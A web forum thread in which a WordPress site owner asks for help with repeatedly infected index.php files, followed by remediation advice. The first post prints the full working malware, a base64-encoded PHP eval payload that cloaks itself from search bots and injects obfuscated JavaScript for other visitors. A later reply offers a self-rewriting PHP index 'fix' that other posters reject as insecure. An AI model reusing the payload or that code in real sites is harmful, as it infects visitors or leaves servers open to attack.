my index.php infected, I cleaned it but the malware keeps coming.

Hello,
I have few websites in my webhosting. They are based on WordPress.

Last few days my websites are infected by malware. All main index.php on domain root folder is infected with code like this:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdGxQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9LWHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWEdJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktETWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVzhnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJvcksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNXRQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUyWDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54amIyOXJhV1ZvZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lOVFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TXpjd056Z3pZakl3TnpRMlpqY3dNMkV5TURKa016SXpPVE01TXpRM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNekl6TURJeU1qQTJPRFkxTmprMk56WTROelF6WkRJeU16TXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyWmpaa056TTJOVFk0TnpRM09EYzROelUyWVRKbE5qUTJORFpsTnpNeVpUWTVObVUyTmpabU1tWTJaRFl4TmprMlpUSmxOekEyT0Rjd00yWTNNRFl4TmpjMk5UTmtOak16TmpNNU5qSTJORE13TXpJMk5UTTVNek0yTlRNMk16a3pOVE0zTmpNeU1qTmxNMk15WmpZNU5qWTNNall4Tm1RMk5UTmxNMk15WmpZME5qazNOak5sSnk1emNHeHBkQ2duZkNjcExEQXNlMzBwS1R3dmMyTnlhWEIwUGc9PSIpOw0KfQ=='));

Code (markup):

I scanned it through http://www.sucuri.net, and it says that my website is infected with MW JS Depack.

I found this article: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think it's different, because I can't find any problem with my wp-settings.php.

If you have any suggestion about this, let me know.

 

It can happen due to number of reasons.
1. Incorrect permissions on your website files.
2. Weak Ftp passwords
3. A malicious script on your domain (under plugins/templates) injecting these code in your files
4. It could be on the server your website is hosted on and injecting not only your website but others too.
etc..

I think you are on a Shared hosting server, and it is best for you to contact the hosting provider and ask them to check the server logs to find out how this happened. If they don't provide proper help, its better to change the hosting company OR get your own server (VPS/dedicated) so you can have proper security settings and then host your websites.

 

change your ftp passwords, your PC might be infected by malware

 

I am agree with Madaboutlinux, Add toughest permission to root directory so that any user can not update the files

 

Hi,

Since the malware keeps coming and injecting line of codes to your files ... i recommenced a full scan of the server and check the permission of the directories and files. While changing the permission ensure that it wont affect the sites working.

 

+ check recently modified files for web shells or reinstall WP from clean distro.

 

I use this....


<?php
/*
HEY ALL...
This indexing method will remove all those malware attackers who try and add code to the index files. By changing the name of a good working non-infected index file to index_REAL.php or whatever. Then createing a new main index.php file that will contain only these 3 lines:
<?php
include("index_REAL.php") ;
?>


So heres where the magic happens... the "index_REAL.php" file will rewrite the index file every time it gets accessed so any info that was changed will be restored with the original code by inserting this code at the end of "index_REAL.php"
<?php
$File = "index.php";
$Handle = fopen($File, 'w');
$Data = "<?php
include(\"index_REAL.php\") ;
?>";
fwrite($Handle, $Data);
fclose($Handle);

NOTE!!! BE CAREFUL NOT TO DELETE THE ORIGINAL "index_installer.php" is a self deleting installer file. If lost, a new copy can be download from: http://tmgraphics.biz/standard/index_installer_BACKUP.php
any questions, please email me at
however you will have to enable the unlink installer line at the bottom of the script
*/
$origindex = "index.php"; ///assuming its .php
$realindex = "index_REAL.php";
echo $myname = basename($_SERVER['PHP_SELF']);

if (file_exists($realindex) == 0){
echo "pass1";
if (file_exists($origindex) == 1){
echo "pass2";
rename($origindex, $realindex);
$Handle = fopen($origindex, 'w');
$Data = "

<?php
include(\"$realindex\") ;
?>";
fwrite($Handle, $Data);
fclose($Handle);
$Handle = fopen($realindex , 'a');
$Data = "<?php
\$File = \"$origindex\";
\$Handle = fopen(\$File, 'w');
\$Data = \"<?php
include(\\\"$realindex\\\") ;
?>\";
fwrite(\$Handle, \$Data);
fclose(\$Handle);
?>

";
fwrite($Handle, $Data);
fclose($Handle);
echo "pass3 <a href= \"$origindex\"> GOTO INDEX</a>";
}
}
else
{
echo "you are already SAFE!!!, '$realindex' ALREADY EXISTS!!";

}
sleep(2);
unlink($myname );
?>

 

No, no, no, no, no, no, no, no and HELL NO.
This code is utter garbage, and provides no more "security" than actually fixing the problem on the server.
Not to mention that the code itself is horribly written.
Just fix the problems on the server, and forget about "magic mushroom cloud fixes" like this one.
I'm just gonna go hit my head on my desk now.

 

Gotta go with @PoPSiCLe on this one; because allowing PHP write access to executable files couldn't possibly open up even bigger security holes than already exist...

Of course that it's a spammish bump of a four year old thread doesn't help with the credibility a whole lot either.

 

Just remove the malware code from index.php and use chatr command to protect the file from modifying. Even the owner wont be able to make changes without disabling it.

To lock
chattr +i /home/username/domains/yourdomain.com/public_html/path/to/file

To unlock
chattr -i /home/username/domains/yourdomain.com/public_html/path/to/file

 

say what you will, after repeated malware attacks thank god I have not had an issue with spammers altering my index file since.
Its only garbage if it doesn't work.

 

Eh, no. It's garbage when it's garbage. That code is horrible, mostly with what it does and how it's written. Add to that that there is no real security in it at all, and the fact that there is NO WAY the normal index.php file should be any more vulnerable than index_blah_something_not_the_real_index.php - a php-file is read ON THE SERVER - nothing in it should be accessible from the outside, apart from the html output to the browser. I don't get how "my index-file is full of malware" doesn't begin to light up some bulbs that MAYBE there's something wrong ON THE SERVER - either the config of the host, or some securityflaws in the code running on it, or just plain old stupidity (which I will guess is a pretty strong contender here).

BTW - there are [ code ] -bbcodes on this forum. No need to paste code directly in a post, and no, it doesn't help that you color it blue.

Besides - for that junk code - this does the exact same thing, in about 1/3 of the lines of code:

<?php
if (!file_exists('index_REAL.php')) {
   if (file_exists('index.php')) {
     rename('index.php','index_REAL.php');
     // $h = fopen('index.php', 'w');
     $data = "<?php
         include (index_REAL.php');
     ?>";
     file_put_contents('index.php',$data);
     $data = "<?php
           $data = '<?php
                       include(\'index_REAL.php\');
                   ?>';
           file_put_contents('index.php',$data);
           ?>";
     file_put_contents('index_REAL.php',$data,FILE_APPEND)
   }
} else {
   echo 'You\'re already "safe" - index_REAL.php already exist';
}

   echo '<a href="index.php">GOTO INDEX</a>';

?>

PHP:

 

try to encode using different algorithms